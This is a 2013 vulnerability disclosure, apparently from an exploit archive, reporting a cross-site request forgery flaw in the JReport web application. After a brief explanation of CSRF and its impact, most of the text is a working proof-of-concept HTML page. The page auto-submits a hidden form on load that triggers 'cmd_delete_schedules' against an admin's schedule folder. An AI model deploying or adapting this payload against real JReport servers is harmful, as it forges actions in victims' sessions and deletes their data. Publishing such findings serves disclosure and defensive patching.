================================================================================================================================================================ JREPORT Cross Site Request Forgery Vulnerability ================================================================================================================================================================ #Date- 24/10/2013 # Author Asheesh kumar Mani Tripathi Asheesh Anaconda # Vulnerbaility Discoverd By :Poonam Singh #Vulnerbility JREPORT is prone to an Cross Site Request Forgery Vulnerability (CSRF) Vulnerability Cross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts. #Impact An attacker may force the users of a web application to execute actions of the attacker's choosing. A successful CSRF exploit can compromise end user data and operation in case of normal user. If the targeted end user is the administrator account, this can compromise the entire web application. <html> <body> <form name="foo" action="https://172.28.1.1/jreport/jinfonet/dealSchedules.jsp"method="post"> <input type=hidden name="d1" value="2013-08-03%252014%253a20%253a41.29"> <input type=hidden name="cmd" value="cmd_delete_schedules"> <input type=hidden name="taskClass" value="APIDemoDynamicExportTask"> <input type=hidden name="taskUrl" value="schedulePage.jsp%3Fjrs.cmd%3Djrs.get_edit_schd_page%26jrs.task_id%3D2013-08-03%252014%253a20%253a41.29%26jrs.catalog%3D%252fSecurity%252fSecurity.cat%26jrs.report%3D%252fSecurity%252fBank_User%2520Activation.cls%26jrs.path%3D%2FUSERFOLDERPATH%2Fadmin"> <input type=hidden name="jrs.path" value="%2FUSERFOLDERPATH%2Fadmin"> </form> <script> document.foo.submit(); </script> </body> </html>